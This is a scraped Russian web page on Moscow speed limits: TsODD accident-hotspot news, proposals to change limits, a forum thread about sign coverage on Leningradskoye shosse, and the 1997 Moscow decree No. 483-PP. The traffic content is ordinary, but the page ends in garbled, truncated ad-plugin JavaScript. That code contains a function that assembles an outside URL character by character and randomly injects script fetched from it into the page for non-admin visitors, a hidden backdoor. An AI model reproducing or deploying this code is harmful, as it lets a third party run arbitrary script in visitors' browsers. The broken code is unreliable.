Ограничения скорости в москве

ЦОДД: главная причина появления очагов аварийности в Москве — превышение скорости

В этом году Центр организации дорожного движения (ЦОДД) планирует провести работы по ликвидации 220 аварийно опасных участков на дорогах Москвы. Для этого оптимизируют работу 63 светофоров, создадут новые островки безопасности, а также изменят скоростной режим на 16 улицах, сообщили в пресс-службе учреждения.

«Основными причинами дорожно-транспортных происшествий на этих участках являются несоблюдение дистанции и очередности проезда транспорта, нарушение правил проезда пешеходного перехода, а также правил перестроения. Но самое серьезное нарушение, которое ведет в большинстве аварий к летальному исходу, — превышение скорости. Последствия от аварий на больших скоростях самые тяжелые. Мы считаем, что в городе необходимо снизить нештрафуемый порог до 10 километров в час. Это поможет сохранить жизни людей», — пояснили в пресс-службе ЦОДД.

Карта очагов аварийности

Для ликвидации опасных участков специалисты установят 25 новых светофоров, оснастят новым оборудованием 121 светофор, организуют дополнительное освещение 28 пешеходных переходов и трех островков безопасности. Непосредственно на аварийных участках планируется установить 112 комплексов фотовидеофиксации. Всего до конца года в Москве появится порядка 600 таких комплексов. Также в городе установят 104 новых дорожных знака и переразметят 112 участков улиц.

План мер по устранению причин возникновения аварий утвердила 29 апреля Городская комиссия по безопасности дорожного движения Москвы.

В 2018 году ЦОДД уже проводил работы по ликвидации очагов аварийности. В рамках проекта на дорогах столицы появилось 78 новых дорожных знаков, 18 светофоров и 59 камер фотовидеофиксации, был изменен режим работы 57 светофоров. В результате в Москве стало на 155 аварийных участков меньше.

Несмотря на постоянный рост населения и увеличение количества машин, число погибших на дорогах в Москве за 10 лет снизилось в два раза.

Москва: с какой скоростью ехать

После того как Москва всего за пару лет развила самую большую в мире сеть фото- и видеоконтроля за нарушениями ПДД, большинству водителей пришлось серьезно пересмотреть свое отношение к соблюдению скоростного режима. И тут выяснилось, что многие москвичи не знают, где какая скорость разрешена. Дело в том, что на половине вылетных магистралей разрешенная скорость составляет 60 км/ч, а на второй половине ее подняли до 80 км/ч. При этом на некоторых дорогах (например, на Ленинградском шоссе) власти не удосужились даже поставить знаки, возвещающие об увеличенной разрешенной скорости. Но самое удивительное то, что скоростной режим может меняться на разных участках одной трассы. Так, на Щелковском шоссе есть лишь маленький отрезок, длиной чуть более километра, на котором можно разогнаться до 80 км/ч, а на проспекте Маршала Жукова, наоборот, – полуторакилометровый участок посреди дороги, на котором нужно притормозить. Разобраться в том, где какая скорость разрешена на ТТК, еще сложнее.

Весь этот хаос предложил привести в порядок экспертный центр Probok.net, убрав колебания в скорости на протяжении магистрали и сделав ее одинаковой на всех дорогах одного типа. По мнению экспертов, после реконструкции на всем Каширс­ком шоссе можно разрешить 80 км/ч. То же самое можно будет сделать после реконструкции на всех вылетных трассах. Градацию скорости предлагается сделать такой же, как в Европе: на обычных улицах – 50 или даже 30 км/ч, а на магистралях – 80 и более. При этом необходимо предварительно подготовить водителей к изменениям, установив соответствующие дорожные знаки и информационные щиты.

Многие не знают, где какая скорость разрешена. На некоторых дорогах власти не удосужились даже поставить знаки

Еще один скоростной эксперимент Probok.net хочет провести на МКАДе – дифференцировать скорость на разных полосах дороги. Эксперты предложили в двух левых рядах увеличить скорость до 110 км/ч, а в крайне правом – понизить до 80 км/ч. Такой режим больше соответствует реальной скорости движения на МКАДе, поэтому абсолютному большинству водителей будет выгоднее соблюдать установленные нормы.

В качестве оптимального места для проведения эксперимента выбран участок с 94-го по 103-й километр, поскольку на протяжении восьми километров кольцо не прерывается съездами и примыканиями. Экспертный центр уже обратился с предложением в соответствующие органы, поэтому уже в ближайшем будущем это может стать реальностью. Правда, в данном случае эксперты ссылаются уже не на опыт развитых стран, а на Украину и Азербайджан.

Комментарий

Александр Шумский

Александр Шумский, руководитель экспертного центра Probok.net:

− Когда на Ленинградке и Звенигородке вводили 80 км/ч, многие кричали: «А вы готовы взять на себя ответственность за трупы?». Но количество ДТП не увеличилось. Аварии никто не отменял, но от того, что водители перестали получать штрафы на Звенигородке за необоснованный скоростной режим, ничего плохого не случилось, более того, появился порядок. Гораздо проще соблюдать понятные правила и двигаться с разрешенной и удобной скоростью, чем пытаться вилять между камерами, нажимая то на газ, то на тормоз.

Сергей Настин

Сергей Настин, редактор:

– Не успевают следить за изменениями скоростного режима иногда не только автомобилисты, но и те, кто его устанавливает. Ведь были и такие случаи, когда камеры видеофиксации настраивали неправильно или забывали перенастроить, в результате чего автомобилистам приходили несправедливые штрафы. Не совсем справедливо и то, что часто штрафы назначаются не за умышленное превышение, а за неосведомленность. Так что, идея сделать разрешенную скорость одинаковой на всех крупных магистралях вполне разумна. Только вот вторая инициатива, получается, идет вразрез с первой – главная проблема дифференциации в том, что она как раз может создать путаницу. Однако на то и нужен эксперимент, чтобы проверить предложенное на практике.

Мэрия Москвы уже готова объявить о понижении скоростного режима

Один из планов мэрии Москвы по борьбе с автомобилистами уже скоро будет приведен в действие. Помните, знаменитое Собянинское «платная парковка не выйдет за пределы Садового кольца»?

Прошло несколько лет, и в 2018 году уже обсуждают парковки не только на оживленных улицах центра и окраин, но и платную парковку во дворах. В сентябре месяце этого года Максим Ликсутов заявил в интервью Коммерсанту, что «Без мнения москвичей решения приниматься не будут». Тем не менее, нелюбимый многими автомобилистами ЦОДД в ноябре выпустил пакет предложений по снижению и увеличению скоростного режима в Москве. Рупор Москвы получил этот проект и предлагает всем читателям ознакомиться с ним.

Стоит заметить, что в самом городе участков где собрались снижать скорость намного больше, чем предложенных участков по повышению скоростного режима.

Справедливости ради надо сказать, что повышать скорость они собираются тоже много где, но по большей части за МКАДом с 60 до 80 км/ч:

  1. Участок Симферопольского шоссе (от Варшавского ш. до границ с МО)
  2. Участок Варшавского шоссе (от МКАД до Молодцовского пр.)
  3. Участок Калужского шоссе ( от МКАД до км 47+700, за исключением дублеров)
  4. Участок Дмитровского шоссе ( от МКАД до д. Грибки ГО Мытищи МО)
  5. Участок Волоколамского шоссе (от ул. Дубосековская до Походного пр, кроме дублеров)
  6. Участок пр-та Мира (от ТТК до Ярославского ш. включая Северянинский путепровод)
  7. Участок Новорязанского шоссе (от МКАД до границ с МО)

Также увеличится скоростной режим до 90 км/ч

  1. Участок Боровского шоссе (от ул. Федосьино до Киевского ш.)
  2. Участок Киевского ш. (на участках от Ленинского пр-та км 41+500, от км 53+000 до км 65+200 за исключением участков, проходящих в границах населенных пунктов)

Теперь давайте коснемся пунктов по поводу снижения скорости. Глава Дептранса Максим Ликсутов уже выходил в эфир с объяснениями по поводу грядущих изменений. В его интервью изобиловали слова «мы проанализировали, мы готовим постановление». У многих в связи с этим возник вопрос: с каких пор и на каком основании вопросами определения максимальной скорости стало заниматься Правительство Москвы? Заодно, возмущенные граждане требуют реорганизации Дептранса, увольнения его главы, ликвидации МАДИ, АМПП и ЦОДД, с передачей их функций ГАИ. Тем более, что столь любимый мэрией «Активный гражданин» уже проводил электронный опрос о понижении скоростного режима, и москвичи дружно выступили против. Сюрпризом с ограничением скорости Ликсутов не ограничится. По факту, вместо разрешенных 60-ти км/ч будут установлены знаки с ограничением до 40км/ч, ведь по словам Ликсутова «по законодательству за превышение более чем на 20 км/ч не штрафуют». Как же оно будет на практике? Яндекс-пробки все чаще показывают нам 10 баллов, и предложения снизить разрешенную скорость еще вызывают удивление. Ведь средняя скорость потока сейчас, без всяких ограничений 35-45 кмч., мест, где возможно и разрешено разогнаться – на пальцах одной руки пересчитать можно. Цель подобных нововведений прозрачна – пополнение казны за счет штрафов. Особенно в ночное время, ведь мало кто может удержаться ехать по пустому городу со скоростью 40 км/ч.

И наконец-то самое интересное – где именно собрались снизить скоростной режим. Со 100 до 80 км/ч на МКАД на всем протяжении

С 80 до 60 км/ч на всем протяжении на ТТК, на Алтуфьевском шоссе и на Курузовском проспекте.

На Щелковском шоссе (от Сиреневого бульвара до 3-й парковой улицы)

На Волгоградском проспекте (от ул. Талалихина до МКАД)

На Каширском шоссе (от Варшавского шоссе до ул. Борисовские пруды)

На Варшавском шоссе (от Каширского шоссе до МКАДа)

Подписывайтесь на канал Рупор Москвы в Telegram, Яндекс.Дзен чтобы быть в курсе последних событий.

Где можно посмотреть схемы ограничений скорости на дорогах Москвы?

Опции темы
Поиск по теме

Где можно посмотреть схемы ограничений скорости на дорогах Москвы?

в том то и дело, что знаки есть, но мы с ДПС разошлись во мнениях где заканчивается его действие.

КОнкретно имею ввиду Ленинградское шоссе.
На участке от МКАД до Войковской висит знак 80.
после Войковской знак нигде не дублируется, но и перекрестков я там не наблюдаю (после которых должно закончиться действие знака 80).
вот и созрел вопрос о том какое все-таки ограничение на участке от Войковской до Белорусской? 60 или 80?
когда ехал, думал, что 80. но теперь почему-то кажется, что все-таки 60 :))

в том то и дело, что знаки есть, но мы с ДПС разошлись во мнениях где заканчивается его действие.

КОнкретно имею ввиду Ленинградское шоссе.
На участке от МКАД до Войковской висит знак 80.
после Войковской знак нигде не дублируется, но и перекрестков я там не наблюдаю (после которых должно закончиться действие знака 80).
вот и созрел вопрос о том какое все-таки ограничение на участке от Войковской до Белорусской? 60 или 80?
когда ехал, думал, что 80. но теперь почему-то кажется, что все-таки 60 :))

поймали между ТТК и Белорусской (сразу после съезда ТТК).

ну мне самому уже кажется, что там 60. сейчас еще постановление погуглю. просто что-то расслабился, увидев повторяющиеся знаки 80 между МКАД и Войковской.
причем, катаюсь там давным давно, без задней мысли, а поймали только сейчас. в День Рождения, блин, отличился :)))

http://www.businesspravo.ru/Docum/Do. mID_52361.html
О ПОВЫШЕНИИ СКОРОСТНОГО РЕЖИМА АВТОТРАНСПОРТА
НА ОТДЕЛЬНЫХ УЧАСТКАХ МАГИСТРАЛЕЙ Г. МОСКВЫ

1 июля 1997 г.
N 483-ПП

Это постановление? Другого не нашёл

http://www.businesspravo.ru/Docum/Do. mID_52361.html
О ПОВЫШЕНИИ СКОРОСТНОГО РЕЖИМА АВТОТРАНСПОРТА
НА ОТДЕЛЬНЫХ УЧАСТКАХ МАГИСТРАЛЕЙ Г. МОСКВЫ

1 июля 1997 г.
N 483-ПП

Это постановление? Другого не нашёл

В целях упорядочения скоростного режима движения автотранспорта
правительство Москвы постановляет:

1. С 07.07.97 увеличить разрешенную скорость движения транспорта:
1.1. До 80 км/час на следующих участках городских магистралей:
— 3-е транспортное кольцо (от Рижской пл. до Бакунинской ул.),
— Кутузовский просп.,
— Можайское шоссе,
— Ленинградское шоссе,
— Волоколамское шоссе (от ул. Врубеля до канала им. Москвы),
— Варшавское шоссе (от Каширского ш. до МКАД),
— Волгоградский просп. (от ул. Талалихина до МКАД),
— Каширское шоссе (от Варшавского ш. до Борисовского пр.),
— Рублевское шоссе,
— Рублево-Успенское шоссе,
— Киевское шоссе,
— Алтуфьевское шоссе,
— Ярославское шоссе (от Северянинского п/п до МКАД),
— Щелковское шоссе (от Сиреневого бульв. до 3-й Парковой ул.);
1.2. До 100 км/час на следующих участках городских магистралей:
— Московская кольцевая автомобильная дорога (с 19-го до 56-й км),
где завершена реконструкция,
— дорого, соединяющие Ленинградское ш. с аэропортами
«Шереметьево-1» и «Шереметьево-2».

В целях упорядочения скоростного режима движения автотранспорта
правительство Москвы постановляет:

1. С 07.07.97 увеличить разрешенную скорость движения транспорта:
1.1. До 80 км/час на следующих участках городских магистралей:
— 3-е транспортное кольцо (от Рижской пл. до Бакунинской ул.),
— Кутузовский просп.,
— Можайское шоссе,
— Ленинградское шоссе,
— Волоколамское шоссе (от ул. Врубеля до канала им. Москвы),
— Варшавское шоссе (от Каширского ш. до МКАД),
— Волгоградский просп. (от ул. Талалихина до МКАД),
— Каширское шоссе (от Варшавского ш. до Борисовского пр.),
— Рублевское шоссе,
— Рублево-Успенское шоссе,
— Киевское шоссе,
— Алтуфьевское шоссе,
— Ярославское шоссе (от Северянинского п/п до МКАД),
— Щелковское шоссе (от Сиреневого бульв. до 3-й Парковой ул.);
1.2. До 100 км/час на следующих участках городских магистралей:
— Московская кольцевая автомобильная дорога (с 19-го до 56-й км),
где завершена реконструкция,
— дорого, соединяющие Ленинградское ш. с аэропортами
«Шереметьево-1» и «Шереметьево-2».

вроде разобрался.
обновленного постановления не нашел, но в общем-то и так все понятно.
Согласно постановлению от 97 года, разрешенная скорость на Ленинградском ШОССЕ = 80 (о чем говорят знаки 80, дублирующиеся до Войковской).
После соединения Ленинградки с Волоколамкой, в районе Сокола, знаков 80 уже нет + только сейчас понял, что там начинается уже НЕ Ленинградское ШОССЕ, а Ленинградский ПРОСПЕКТ.
Поэтому, судя по всему, действительно, ограничение 60.

ну что ж. вынужден признать, что среди ГАИшников тоже попадаются ЛЮДИ! Сделали мне отличный подарок на День Рождения.
больше там гонять не буду.

ПРАВИТЕЛЬСТВО МОСКВЫ
ПОСТАНОВЛЕНИЕ
от 1 июля 1997 г. N 483
О ПОВЫШЕНИИ СКОРОСТНОГО РЕЖИМА
АВТОТРАНСПОРТА НА ОТДЕЛЬНЫХ УЧАСТКАХ
МАГИСТРАЛЕЙ Г. МОСКВЫ
(в ред. постановления Правительства Москвы
от 02.12.2008 N 1094-ПП)

В последнее время в г. Москве выполнен большой объем работ по улучшению дорожных условий на основных городских магистралях и их обустройству современными техническими средствами регулирования, что позволяет двигаться автотранспорту с более высокими скоростями.
В целях упорядочения скоростного режима движения автотранспорта Правительство Москвы постановляет:
1. С 07.07.97 увеличить разрешенную скорость движения транспорта:
1.1. До 80 км/час на следующих участках городских магистралей:
— абзац исключен. — Постановление Правительства Москвы от 02.12.2008 N 1094-ПП
— Кутузовский просп.
— Можайское шоссе
— Ленинградское шоссе
— Волоколамское шоссе (от ул. Врубеля до канала им. Москвы)
— Варшавское шоссе (от Каширского шоссе до МКАД)
— Волгоградский просп. (от ул. Талалихина до МКАД)
— Каширское шоссе (от Варшавского шоссе до Борисовского пр.)
— Рублевское шоссе
— Рублево — Успенское шоссе
— Киевское шоссе
— Алтуфьевское шоссе
— Ярославское шоссе (от Северянинского п/п до МКАД)
— Щелковское шоссе (от Сиреневого б-ра до 3-й Парковой ул.).
1.2. До 100 км/час на следующих участках городских магистралей:
— Московская кольцевая автомобильная дорога (с 19 по 56 км), где завершена реконструкция;
— дороги, соединяющие Ленинградское шоссе с аэропортами «Шереметьево-1» и «Шереметьево-2».
2. Управлению ГАИ ГУВД г. Москвы определить количество и места установки соответствующих дорожных знаков.
3. Специализированному монтажно — эксплуатационному управлению ГУВД г. Москвы, ГП «Доринвест» определить объем финансирования указанных работ и обеспечить установку необходимого количества дорожных знаков на участках, указанных в п. 1 настоящего постановления.
4. Департаменту финансов совместно с Департаментом экономической политики и развития Москвы по представлению СМЭУ ГУВД г. Москвы и ГП «Доринвест» обеспечить целевое финансирование работ по установке соответствующих дорожных знаков и указателей в пределах утвержденных бюджетных показателей.
5. Пресс — центру Мэрии и Правительства Москвы обеспечить публикацию настоящего постановления в средствах массовой информации.
6. Контроль за выполнением настоящего постановления возложить на первого заместителя Премьера Правительства Москвы Б.В. Никольского.
Премьер Правительства Москвы
Ю.М. Лужков

На СВХ в Москве увеличат разрешенную скорость с 60 до 90 километров в час

30 августа 2019 14:10 6

Нелепое ограничение в 60 км/ч на недавно построенной отличной скоростной магистрали отменено, будет введён скоростной режим 90 км/ч Фото: Михаил ФРОЛОВfotograff3

Иначе как хорошей эту новость московские автомобилисты вряд ли назовут. После многочисленных жалоб было принято решение о пересмотре скоростного режима на СВХ (северо-восточной хорде). Теперь на этой современной магистрали можно будет разогнаться до 90 километров в час.

— Руководство ЦОДД добилось изменения скоростного режима на Северо-восточной хорде. Нелепое ограничение в 60 км/ч на недавно построенной отличной скоростной магистрали отменено, будет введён скоростной режим 90 км/ч. Такое решение уже принято и будет реализовано в течении двух недель Задержка связана с необходимостью оформления документов, перенастройки камер и работами по замене знаков. О реализации данного решения будет сообщено отдельно, — сообщил Александр Евсин, руководитель ситуационного центра ЦОДД.

Уже в близлежащие дни начнут установку новых дорожных знаков, кроме того, будут перенастроены приборы фиксации нарушений ПДД.

В ТЕМУ

80 км/ч на МКАД не прижилось

Ранее в СМИ появилась информация об ограничении скорости на одном из участков Московской кольцевой дороги до 80 км/ч. Но это решение было признано ошибочным, скоростной режим восстановлен до 100 км/ч, знаки 80 км/ч демонтированы.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}